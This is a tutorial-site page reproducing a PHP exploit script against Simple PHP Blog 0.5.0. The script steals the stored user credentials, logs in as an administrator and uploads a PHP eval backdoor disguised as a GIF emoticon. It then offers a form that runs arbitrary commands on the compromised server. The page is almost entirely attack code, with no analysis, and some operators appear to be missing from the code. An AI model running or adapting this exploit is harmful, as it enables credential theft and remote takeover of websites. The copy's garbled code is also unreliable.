Simple PHP Blog (SPHPBlog)_Exploit教程-查字典教程网

sIMPLE php bLOG 0.5.0 eXPLOIT

bY mAXzA 2008

function curl($url,$postvar){

global $cook;

$ch = curl_init( $url );

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_HEADER, 1);

curl_setopt ($ch, CURLOPT_REFERER,"$url");

if (strlen($postvar)<3) $postvar="123";

curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);

if (strlen($cook)>3)

curl_setopt ($ch, CURLOPT_COOKIE, "$cook");

$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "<hr>$err<hr>";

curl_close($ch);

return $res;

} function error($msg){

print "<hr>$msg<hr>n<h1>Not Exploitable";exit;

} extract($_POST);extract($_GET); print "<pre>URL:<form method=post><input size=80 name=url value=`$url`>";

if (strlen($eval)>3){

$eval=stripslashes($eval);

print "nEnter PHP Command:n<textarea name=eval rows=10 cols=90>$eval</textarea>";

print "<input type=submit value='Eval'></form>";

$res=curl("$url/images/emoticons/sphp.php","z=$eval");

$res=strstr($res,"GIF89a");

print substr($res,41);exit;

} if (strlen($url)>10)

{

print "n<hr>Trying to Get /config/users.php...";flush();

$res=curl($url."/config/users.php","");

if (strstr($res,'|')) print "Done!nn$res";

else error("nnUsername & Password Not Foundnn$res"); print "n<hr>Trying to Get Username & Password...";flush();

$res=str_replace("rn","n",$res);

$res=substr($res,strpos($res,"nn") 2);

$line=explode("n",$res);$n=count($line)-1;

if ($n) {

print "nDone! Found - $n users:n";

for ($x=0;$x<$n;$x ){

$up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);

print "nUsername - ".$up[1]."tPassword - ".$up[2];

}

} print "n<hr>Trying to Login...";flush();

$postvar="user=$user[0]&pass=$pass[0]&";

$res=curl($url."/login_cgi.php","$postvar");

$cook=strstr($res,'Set-Cookie: sid=');

$cook=substr($cook,12,strpos($cook,';')-12);

if ($cook) print "nnDone... Cookie - $cook";else error("n<h1>Error To Login</h1>nnn$res"); print "n<hr>Trying to Upload Emoticon...";flush();

$buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8 Ow==";

if (@filesize('sphp.php')!=82){

$f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);

}

$f=getcwd()."/sphp.php";

$res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));

if (strstr($res,"Success!")) print "nnDone! Exploit path - $url/images/emoticons/sphp.php"; else error("n<h1>Error To Upload</h1>nnn$res"); print "n<hr>Trying to Exploit...";flush();

$res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");

if (strstr($res,"20080824")) print "nnDone! Exploit Working!"; else error("n<h1>Error To Exploit</h1>nnn$res"); print "n<hr>Trying to Logout...";flush();

$res=curl($url."/logout.php","");

if (strstr($res,"You are now logged out")) print "nnDone!"; else error("n<h1>Error To Logout</h1>nnn$res");

print "nEnter PHP Command:n<textarea name=eval rows=10 cols=90></textarea>";

}

print "<input type=submit ></form>";